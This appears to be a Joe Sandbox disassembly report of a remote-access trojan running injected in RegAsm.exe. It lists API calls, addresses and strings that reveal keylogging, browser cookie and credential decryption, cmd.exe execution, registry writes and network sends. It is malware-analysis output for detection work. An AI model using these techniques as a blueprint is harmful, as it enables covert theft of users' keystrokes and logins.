                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                APIs
                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                • String ID: XQG$NG$PG
                                • API String ID: 1634807452-3565412412
                                • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                • API String ID: 2506810119-1068371695
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63771986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                APIs
                                • SystemParametersInfoW.USER32 ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$okmode$PG
                                • API String ID: 3411444782-3370592832
                                • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                APIs
                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                • API String ID: 1497725170-1359877963
                                • Opcode ID: d3067f7dc3e5f538a631bdb1baca68ba82ac4dff48b355963c3d2e2bd7d7ef1d
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: d3067f7dc3e5f538a631bdb1baca68ba82ac4dff48b355963c3d2e2bd7d7ef1d
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                • RegSetValueExW.ADVAPI32 ref: 0041384D
                                • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                • ShowWindow.USER32(00000009), ref: 00416C61
                                • SetForegroundWindow.USER32 ref: 00416C6D
                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                • String ID: !D@
                                • API String ID: 3446828153-604454484
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                APIs
                                • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: TerminateThread$HookUnhookWindows
                                • String ID: pth_unenc
                                • API String ID: 3123878439-4028850238
                                APIs
                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: GetCursorInfo$User32.dll
                                • API String ID: 1646373207-2714051624
                                APIs
                                • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetLastInputInfo$User32.dll
                                • API String ID: 2574300362-1519888992
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: CloseHandleOpenProcess
                                • String ID:
                                • API String ID: 39102293-0
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
